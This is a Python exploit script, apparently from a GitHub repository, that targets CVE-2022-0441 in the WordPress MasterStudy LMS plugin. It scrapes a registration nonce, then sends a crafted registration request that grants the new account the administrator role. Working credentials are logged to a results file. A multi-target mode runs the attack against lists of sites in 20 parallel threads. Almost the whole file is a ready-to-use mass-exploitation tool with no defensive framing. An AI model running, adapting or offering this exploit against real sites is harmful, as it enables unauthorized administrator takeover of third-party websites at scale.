-
Notifications
You must be signed in to change notification settings - Fork 3
/
MasterStudy.py
86 lines (74 loc) · 3.58 KB
/
MasterStudy.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
# @author : biulove0x
# @name : WP Plugins Master Study Exploiter
# @tg : @biulove0x
from cmath import exp
from urllib3.exceptions import InsecureRequestWarning
import concurrent.futures
import requests, re, argparse
print(
'''
###############################################
# @author : biulove0x #
# @name : WP Plugins Master Study Exploiter #
# @cve : CVE-2022-0441 #
###############################################
''')
def masterstudy(_target, _timeout=5):
_sessionget = requests.Session()
_headers = {
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36'
}
def save_result(_result):
_saved = open('RESULT-WPMS.txt', 'a+')
_saved.write(_result + '\n')
try:
_validationPlugins = _sessionget.get(url=_target, headers=_headers, allow_redirects=True, verify=False, timeout=_timeout)
if 'stm_lms_register' in _validationPlugins.text:
_getnonce = re.compile('stm_lms_register":"(.*?)(?:")')
_findnonce = _getnonce.findall(_validationPlugins.text)
_data = '{"user_login":"biulove0xpentest","user_email":"biulove0xpentest@domainexample.com","user_password":"biulove0xpentest","user_password_re":"biulove0xpentest","become_instructor":"","privacy_policy":true,"degree":"","expertize":"","auditory":"","additional":[],"additional_instructors":[],"profile_default_fields_for_register":{"wp_capabilities":{"value":{"administrator":1}}}}'
_postExploit = _sessionget.post(url=_target + 'wp-admin/admin-ajax.php?action=stm_lms_register&nonce=' + _findnonce[0], headers=_headers, allow_redirects=True, data=_data, timeout=_timeout)
if '"status":"success"' in _postExploit.text and '"message":"' in _postExploit.text:
print('[-] ' + _target + 'wp-admin/ => Success')
_dataresult = _target + 'wp-admin/ | biulove0xpentest | biulove0xpentest'
save_result(_dataresult)
else:
print('[*] ' + _target + ' => Failed, try manual')
save_result(_target)
else:
print('[+] ' + _target + ' Not found!')
except:
print('[%] ' + _target + ' Requests failed')
def main(_choose, _target):
if _choose == 1:
masterstudy(_target)
elif _choose == 2:
with concurrent.futures.ThreadPoolExecutor(max_workers=20) as executor:
_ur_list = open(_target, 'r').read().split()
_futures = []
for _url in _ur_list:
_futures.append(executor.submit(masterstudy, _target=_url))
for _future in concurrent.futures.as_completed(_futures):
if(_future.result() is not None):
print(_future.result())
else:
exit()
## SSL Bypass
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
## Setup args
_parser = argparse.ArgumentParser(description='CVE-2022-0441 [ WordPress Plugin MasterStudy LMS 2.7.5 - Unauthenticated Admin Account Creation ]')
_parser.add_argument('-t', metavar='example.com', type=str, help='Single target')
_parser.add_argument('-l', metavar='target.txt', type=str, help='Multiple target')
_args = _parser.parse_args()
## Variable args
_singleTarget = _args.t
_multiTarget = _args.l
if __name__ == '__main__':
if not _singleTarget == None:
_choose = 1
main(_choose, _singleTarget)
elif not _multiTarget == None:
_choose = 2
main(_choose, _multiTarget)
else:
print('MasterStudy.py --help for using tools')